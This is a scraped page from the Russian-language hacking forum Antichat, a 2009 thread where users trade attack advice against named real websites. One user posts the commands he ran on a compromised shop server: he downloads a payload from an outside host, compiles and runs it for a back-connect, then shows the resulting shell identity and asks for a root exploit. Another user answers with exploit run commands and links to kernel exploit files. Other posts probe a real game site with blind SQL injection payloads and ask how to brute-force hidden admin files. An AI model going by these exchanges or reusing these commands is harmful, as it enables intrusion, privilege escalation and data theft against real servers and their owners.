FORUMS

MEMBERS

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 898 из 2422

898

Опции темы

Поиск в этой теме

Опции просмотра

25.09.2009, 17:51

~~Swift~~

Banned

Регистрация: 27.10.2008

Сообщений: 78

Провел на форуме:
174909

Репутация: 454

скуля тут не прокатит. Раскрытие путей разве что

25.09.2009, 22:27

Shadrin

Постоянный

Регистрация: 20.08.2008

Сообщений: 348

Провел на форуме:
2200171

Репутация: 270

Отправить сообщение для Shadrin с помощью ICQ

такая проблема ,есть сайт надо найти админку,
site/admin/ 403 форбайден.
мне надо найди файлы в папке site/admin/,если ли софт для брута файлов?
можно канешно сгенирить списки,и прочекать линки ,но это на случай что спец софта нету

26.09.2009, 12:42

mailbrush

Познавший АНТИЧАТ

Регистрация: 24.06.2008

Сообщений: 1,996

Провел на форуме:
6075534

Репутация: 2731

Отправить сообщение для mailbrush с помощью ICQ

Цитата:

Сообщение от Shadrin

Если в .htaccess на все файлы стоит Forbidden, то никак.

Есть вопрос по руту сервака. Делаю back-коннект к себе. Комманды:

Код:

cd /tmp
wget http://evilcode.hmarka.net/2.tgz
gcc run.c -O run
./run
padlina z lublina! //это выводит после запуска
id

Код:

uid=48(apache) gid=48(apache) groups=48(apache),503(nismo),504(shopua@rambler.ru),505(shopua555),506(kamar),507(geniewgen)

Т.е. сервак не порутался... Как его порутать? Есть ли сплоит какой?

Код:

Linux shopua.com.ua 2.6.26.8-57.fc8 #1 SMP Thu Dec 18 19:19:45 EST 2008 i686 athlon i386 GNU/Linux

26.09.2009, 15:16

Shadrin

Постоянный

Регистрация: 20.08.2008

Сообщений: 348

Провел на форуме:
2200171

Репутация: 270

Цитата:

Сообщение от mailbrush

Если в .htaccess на все файлы стоит Forbidden, то никак.

нет отдает 404 на файлы.
--
у меня вопрос нужно запретить запуск пхп скрптов,в папке,можно сделать это через htaccess?спасибо!
-уже нашел)

Код:

RemoveHandler .php .phtml .php3
AddType application/x-httpd-php-source .php .phtml .php3

Последний раз редактировалось Shadrin; 26.09.2009 в 15:24..

26.09.2009, 15:22

BlackSun

Members of Antichat - Level 5

Регистрация: 01.04.2007

Сообщений: 1,268

Провел на форуме:
10046345

Репутация: 4589

Цитата:

Сообщение от mailbrush

Если в .htaccess на все файлы стоит Forbidden, то никак.

Есть вопрос по руту сервака. Делаю back-коннект к себе. Комманды:

Код:

cd /tmp
wget http://evilcode.hmarka.net/2.tgz
gcc run.c -O run
./run
padlina z lublina! //это выводит после запуска
id

Код:

uid=48(apache) gid=48(apache) groups=48(apache),503(nismo),504(shopua@rambler.ru),505(shopua555),506(kamar),507(geniewgen)

Т.е. сервак не порутался... Как его порутать? Есть ли сплоит какой?

Код:

Linux shopua.com.ua 2.6.26.8-57.fc8 #1 SMP Thu Dec 18 19:19:45 EST 2008 i686 athlon i386 GNU/Linux

chmod 777 exploit.so;./exploit.so
ибо в твоем случае через пулсаудио файл не запустился.

--------------------------
http://fsb-my.name/c/exploit.c
http://fsb-my.name/c/pwnkernel.c
http://fsb-my.name/c/run.sh

26.09.2009, 12:50

Spyder

Members of Antichat - Level 5

Регистрация: 09.10.2006

Сообщений: 1,698

Провел на форуме:
9098076

Репутация: 4303

mailbrush, пробуй другие, на милворме полно аналогичных

__________________
God forgive me for I have sinned
It’s been six months since my last confession
There is nowhere that I can run to
My soul I place in your hands

26.09.2009, 12:52

mailbrush

Познавший АНТИЧАТ

Регистрация: 24.06.2008

Сообщений: 1,996

Провел на форуме:
6075534

Репутация: 2731

Цитата:

Сообщение от Spyder

mailbrush, пробуй другие, на милворме полно аналогичных

Только эти аналогичные не хотят компилиться нигде...

26.09.2009, 14:04

warlok

Постоянный

Регистрация: 18.02.2008

Сообщений: 368

Провел на форуме:
4075418

Репутация: 386

Можно ли тут чтонить зделать тут ? у меня невышло =\
lineager.ru/lwdb/index.php?part=items&id=1+and+79=79

26.09.2009, 14:16

WNZRS

Участник форума

Регистрация: 03.09.2009

Сообщений: 179

Провел на форуме:
1014907

Репутация: 90

Отправить сообщение для WNZRS с помощью ICQ

нельзя, там фильтруется

#10

26.09.2009, 14:22

ElteRUS

Постоянный

Регистрация: 11.10.2007

Сообщений: 406

Провел на форуме:
7215020

Репутация: 1423

С запятыми не пашет вроде

http://lineager.ru/lwdb/index.php?part=items&id=1+and+ascii(substring((sel ect+table_name+from+information_schema.tables+limi t+1+offset+1)+from+1+for+1))>1

Страница 898 из 2422

898

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Сценарии/CMF/СMS	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход

ANTICHAT.XYZ